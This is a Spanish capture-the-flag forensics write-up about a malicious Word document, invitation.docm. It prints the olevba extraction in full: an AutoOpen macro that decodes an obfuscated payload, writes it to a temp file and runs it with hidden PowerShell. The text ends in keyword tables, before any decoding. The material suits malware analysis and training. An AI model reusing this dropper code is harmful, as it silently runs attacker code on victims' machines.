Halloween Invitation
19 minutos de lectura
Se nos proporciona un archivo ZIP que contiene un fichero llamado invitation.docm:
$ unzip -l forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
Length Date Time Name
--------- ---------- ----- ----
5252634 10-12-2022 08:04 invitation.docm
--------- -------
5252634 1 file
$ unzip forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
inflating: invitation.docm
$ file invitation.docm
invitation.docm: Microsoft Word 2007+
Extracción de macros VBA
Esto significa que tenemos un documento de Microsoft Word con macros VBA. En lugar de abrir Microsoft Word, podemos usar olevba de oletools para extraer el código VBA:
$ olevba invitation.docm
olevba 0.60.1 on Python 3.10.8 - http://decalage.info/python/oletools
===============================================================================
FILE: invitation.docm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
Sub lmavedb()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374"))
Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b"))
secret = ktmlmpc.ReadAll
ktmlmpc.Close
Code = "powershell -WindowStyle hidden -e """ & secret
x = Shell(Code, 1)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|CreateTextFile |May create a text file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|powershell |May run PowerShell commands |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Hex String|Scripti |53637269707469 |
|Hex String|ng.FileSystemObject |6e672e46696c6553797374656d4f626a656374 |
|Hex String|\hist |5c68697374 |
|Hex String|ory.bak |6f72792e62616b |
|Hex String|74 65 66 122 65 68 |373420363520363620313232203635203638203438203|
| |48 65 74 1 |6352037342031 |
|Hex String|19 65 51 65 68 99 65|313920363520353120363520363820393920363520373|
| |76 103 65 51 65 68 |620313033203635203531203635203638203831203635|
| |81 65 76 103 |20373620313033 |
|Hex String|65 120 65 68 10 |363520313230203635203638203130 |
|Hex String|7 65 79 65 65 117 65|372036352037392036352036352031313720363520363|
| |68 85 65 77 103 65 |820383520363520373720313033203635203534203635|
| |54 65 68 103 65 77 |20363820313033203635203737203635203635203532 |
| |65 65 52 | |
|Hex String|65 68 65 65 74 |3635203638203635203635203734 |
|Hex String| 119 65 55 65 67 81 |203131392036352035352036352036372038312036352|
| |65 97 81 65 57 65 67|039372038312036352035372036352036372039392036|
| |99 65 90 65 65 48 65|35203930203635203635203438203635203638203737 |
| |68 77 | |
|Hex String|65 89 103 66 106 65 |363520383920313033203636203130362036352037312|
| |71 77 65 78 103 66 |037372036352037382031303320363620313037203635|
| |107 65 6 |2036 |
|Hex String|7 48 65 77 65 65 48 |372034382036352037372036352036352034382036352|
| |65 68 77 65 90 |03638203737203635203930 |
|Hex String|103 65 121 65 68 81 |313033203635203132312036352036382038312036352|
| |65 77 65 65 5 |037372036352036352035 |
|Hex String|3 65 67 48 65 78 119|332036352036372034382036352037382031313920363|
| |66 108 65 71 69 65 |620313038203635203731203639203635203737203130|
| |77 103 65 |33203635 |
|Hex String|122 65 71 69 65 77 |313232203635203731203639203635203737203130332|
| |103 66 106 65 67 99 |036362031303620363520363720393920363520373920|
| |65 79 119 65 107 65 |313139203635203130372036352037322036352036352|
| |72 65 65 80 81 65 1 |038302038312036352031 |
|Hex String|10 65 |3130203635 |
|Hex String|71 103 65 100 65 66 |373120313033203635203130302036352036362034382|
| |48 65 72 65 65 79 |036352037322036352036352037392031303320 |
| |103 | |
|Hex String|65 118 65 67 56 65 |363520313138203635203637203536203635203734203|
| |74 119 65 55 65 67 |13139203635203535203635203637203831 |
| |81 | |
|Hex String|65 100 103 65 57 65 |363520313030203130332036352035372036352036392|
| |69 107 65 98 103 66 |031303720363520393820313033203636203530203635|
| |50 65 71 56 65 97 |203731203536203635203937203131392036362031303|
| |119 66 108 65 67 4 |82036352036372034 |
|Hex String|8 65 85 |38203635203835 |
|Hex String|103 66 108 65 72 77 |313033203636203130382036352037322037372036352|
| |65 100 65 66 78 65 |031303020363520363620373820363520373120383520|
| |71 85 65 100 65 66 |363520313030203635203636203131312036352037312|
| |111 65 71 56 65 90 |03536203635203930 |
|Hex String| 65 65 |203635203635 |
|Hex String|103 65 67 48 65 86 |313033203635203637203438203635203836203831203|
| |81 66 122 65 71 8 |636203132322036352037312038 |
|Hex String|5 65 81 103 66 104 |352036352038312031303320363620313034203635203|
| |65 72 77 65 97 81 66|732203737203635203937203831203636203130362036|
| |106 65 |35 |
|Hex String|70 65 65 89 81 66 |373020363520363520383920383120363620313231203|
| |121 65 72 77 65 97 |635203732203737203635203937203831203636 |
| |81 66 | |
|Hex String| 117 65 71 99 65 73 |203131372036352037312039392036352037332036352|
| |65 65 116 65 70 85 |0363520313136203635203730203835203635 |
| |65 | |
|Hex String|99 103 66 112 65 67 |393920313033203636203131322036352036372036352|
| |65 65 74 65 66 119 |036352037342036352036362031313920363520363720|
| |65 67 81 65 99 119 |3831203635203939203131392036352031313820 |
| |65 118 | |
|Hex String|65 71 81 65 78 65 |3635203731203831203635203738203635 |
|Hex String|65 122 65 71 73 65 |363520313232203635203731203733203635 |
|Hex String| 89 119 66 106 65 68|203839203131392036362031303620363520363820383|
| |89 65 90 65 65 103 |920363520393020363520363520313033203635203637|
| |65 67 48 65 83 65 66|20343820363520383320363520363620313038 |
| |108 | |
|Hex String|65 71 69 65 90 65 66|363520373120363920363520393020363520363620313|
| |108 65 72 73 65 99 |038203635203732203733203635203939203131392036|
| |119 65 |35 |
|Hex String| 103 65 69 65 65 101|203130332036352036392036352036352031303120313|
| |119 65 105 65 69 |13920363520313035203635203639 |
|Hex String|69 65 100 81 66 48 |363920363520313030203831203636203438203635203|
| |65 71 103 65 9 |731203130332036352039 |
|Hex String|8 119 66 121 65 71 |382031313920363620313231203635203731203130372|
| |107 65 101 103 66 |036352031303120313033203636203130342036352037|
| |104 65 72 81 |32203831 |
|Hex String|65 97 81 66 |363520393720383120363620 |
|Hex String|118 65 71 52 65 73 |313138203635203731203532203635203733203130332|
| |103 65 57 65 67 81 |036352035372036352036372038312036352039372038|
| |65 97 81 66 57 65 68|312036362035372036352036382031313520363520313|
| |115 65 100 |030 |
|Hex String|119 66 111 65 71 107|313139203636203131312036352037312031303720363|
| |65 98 65 66 108 |520393820363520363620313038 |
|Hex String| 65 67 65 65 75 65 |203635203637203635203635203735203635203635203|
| |65 107 65 72 81 65 |130372036352037322038312036352039392031303320|
| |99 103 66 |3636 |
|Hex String|49 65 71 85 65 75 81|343920363520373120383520363520373520383120363|
| |66 55 65 67 81 65 89|620353520363520363720383120363520383920313139|
| |119 65 57 65 67 103 |203635203537203635203637203130332036352038332|
| |65 83 81 66 11 |03831203636203131 |
|Hex String|7 65 72 |37203635203732 |
|Hex String|89 65 98 119 66 114 |383920363520393820313139203636203131342036352|
| |65 71 85 65 76 81 66|03731203835203635203736203831203636203833 |
| |83 | |
|Hex String| 65 71 85 65 99 119 |203635203731203835203635203939203131392036362|
| |66 48 65 69 48 65 90|03438203635203639203438203635203930 |
|Hex String|81 66 48 65 71 103 |383120363620343820363520373120313033203635203|
| |65 98 119 66 107 65 |938203131392036362031303720363520363720363520|
| |67 65 65 76 81 66 86|36352037362038312036362038362036352037322037 |
| |65 72 7 | |
|Hex String|7 65 90 81 66 67 |37203635203930203831203636203637 |
|Hex String|65 71 69 65 99 119 |363520373120363920363520393920313139203636203|
| |66 112 65 71 77 65 |131322036352037312037372036352038352036352036|
| |85 65 66 104 65 |362031303420363520 |
|Hex String|72 73 65 99 119 66 |373220373320363520393920313139203636203131322|
| |112 65 71 |03635203731 |
|Hex String|52 65 90 119 65 103 |353220363520393020313139203635203130332036352|
| |65 67 48 65 86 81 66|036372034382036352038362038312036362031323120|
| |121 65 71 107 65 73 |363520373120313037203635203733203635203635203|
| |65 65 107 65 72 65 |13037203635203732203635 |
|Hex String|74 65 66 122 65 67 |37342036352036362031323220363520363720 |
|Hex String|56 65 77 65 65 48 65|353620363520373720363520363520343820363520363|
| |68 77 65 90 103 65 |820373720363520393020313033203635203132312036|
| |121 65 68 81 65 77 |35203638203831203635203737203635203635 |
| |65 65 | |
|Hex String|53 65 67 65 65 76 81|353320363520363720363520363520373620383120363|
| |66 73 65 71 85 65 89|620373320363520373120383520363520383920383120|
| |81 66 107 65 |363620313037203635 |
|Hex String| 71 85 65 99 103 66 |203731203835203635203939203130332036362031323|
| |122 65 67 |2203635203637 |
|Hex String|65 65 81 65 66 55 65|363520363520383120363520363620353520363520363|
| |67 73 65 8 |72037332036352038 |
|Hex String|1 81 66 49 65 72 81 |312038312036362034392036352037322038312036352|
| |65 97 65 66 118 65 |039372036352036362031313820363520373220373320|
| |72 73 65 97 |3635203937 |
|Hex String|81 66 54 65 71 69 65|383120363620353420363520373120363920363520 |
|Hex String|100 65 66 112 65 71 |313030203635203636203131322036352037312035362|
| |56 65 98 103 65 105 |036352039382031303320363520313035203635203638|
| |65 68 48 65 74 65 66|203438203635203734203635203636 |
|Hex String|112 65 72 48 65 |31313220363520373220343820363520 |
|Hex String|75 81 65 55 65 71 |373520383120363520353520363520373120313037203|
| |107 65 90 103 65 103|635203930203130332036352031303320363520363720|
| |65 67 103 65 74 65 |31303320363520373420363520363620313036203635 |
| |66 106 65 | |
|Hex String| 65 65 76 81 66 117 |203635203635203736203831203636203131372036352|
| |65 71 85 65 73 65 65|037312038352036352037332036352036352031313020|
| |110 65 69 52 65 98 |363520363920353220363520393820313139203636203|
| |119 66 117 65 71 85 |13137203635203731203835 |
|Hex String|65 74 119 65 112 65 |363520373420313139203635203131322036352036372|
| |67 65 65 101 119 65 |036352036352031303120313139203635203130372036|
| |107 65 72 73 65 80 |352037322037332036352038302038312036362031313|
| |81 66 112 65 |220363520 |
|Hex String|71 85 65 101 |373120383520363520313031 |
|Hex String|65 65 103 |36352036352031303320 |
|Hex String|65 67 81 65 89 119 |363520363720383120363520383920313139203635203|
| |65 103 65 67 48 65 |130332036352036372034382036352038322038312036|
| |82 81 66 121 65 72 |362031323120363520373220373320363520393820313|
| |73 65 98 119 66 |139203636 |
|Hex String|121 65 69 69 65 89 |313231203635203639203639203635203839203131392|
| |119 66 48 65 71 107 |036362034382036352037312031303720363520393820|
| |65 98 119 66 117 65 |3131392036362031313720363520 |
|Hex String|67 65 65 85 119 66 |363720363520363520383520313139203636203438203|
| |48 65 |635 |
|Hex String|71 56 65 99 65 65 |373120353620363520393920363520363520313033203|
| |103 65 67 48 65 82 |635203637203438203635203832203831203636203132|
| |81 66 121 |3120 |
|Hex String|65 72 73 65 98 119 |363520373220373320363520393820313139203636203|
| |66 121 65 70 89 |13231203635203730203839 |
|Hex String|65 89 81 66 121 65 |363520383920383120363620313231203635203731203|
| |71 107 65 89 8 |130372036352038392038 |
|Hex String|1 66 105 65 71 119 |312036362031303520363520373120313139203635203|
| |65 90 81 65 103 65 |930203831203635203130332036352037312038352036|
| |71 85 65 79 |35203739 |
|Hex String|119 65 107 65 72 73 |313139203635203130372036352037322037332036352|
| |65 80 81 |0383020383120 |
|Hex String|66 80 65 72 85 65 |363620383020363520373220383520363520313030203|
| |100 65 65 116 65 70 |635203635203131362036352037302037372036352031|
| |77 65 100 65 66 |3030203635203636 |
|Hex String|121 65 7 |3132312036352037 |
|Hex String|1 107 65 98 103 66 |312031303720363520393820313033203636203131302|
| |110 65 67 65 65 76 |036352036372036352036352037362038312036362037|
| |81 66 74 65 71 52 65|342036352037312035322036352039392036352036362|
| |99 65 66 49 65 |03439203635 |
|Hex String|72 81 65 84 119 66 |373220383120363520383420313139203636203130352|
| |105 65 71 111 65 90 |036352037312031313120363520393020383120363620|
| |81 66 106 65 72 81 |313036203635203732203831203635203733203635203|
| |65 73 65 65 107 65 |63520313037203635203732 |
| |72 | |
|Hex String|65 79 119 65 107 65 |363520373920313139203635203130372036352037322|
| |72 81 65 80 81 66 |0383120363520383020383120363620 |
|Hex String|74 65 71 52 65 100 |373420363520373120353220363520313030203130332|
| |103 66 118 65 71 115|036362031313820363520373120313135203635203930|
| |65 90 | |
|Hex String|81 65 116 65 70 73 |383120363520313136203635203730203733203635203|
| |65 90 81 66 122 65 |930203831203636203132322036352037322038312036|
| |72 81 65 84 81 66 10|35203834203831203636203130 |
|Hex String|8 65 72 81 65 97 65 |382036352037322038312036352039372036352036362|
| |66 118 |0313138 |
|Hex String|65 71 81 65 73 |3635203731203831203635203733 |
|Hex String| 65 65 116 65 70 85 |203635203635203131362036352037302038352036352|
| |65 99 103 66 112 65 |039392031303320363620313132203635203637203635|
| |67 65 65 74 65 66 |20363520373420363520363620313139203635203637 |
| |119 65 67 | |
|Hex String|81 65 99 119 65 118 |383120363520393920313139203635203131382036352|
| |65 68 99 65 90 81 66|036382039392036352039302038312036362031303420|
| |104 65 68 73 65 77 |363520363820373320363520373720313139203636203|
| |119 66 104 65 68 73 |1303420363520363820373320 |
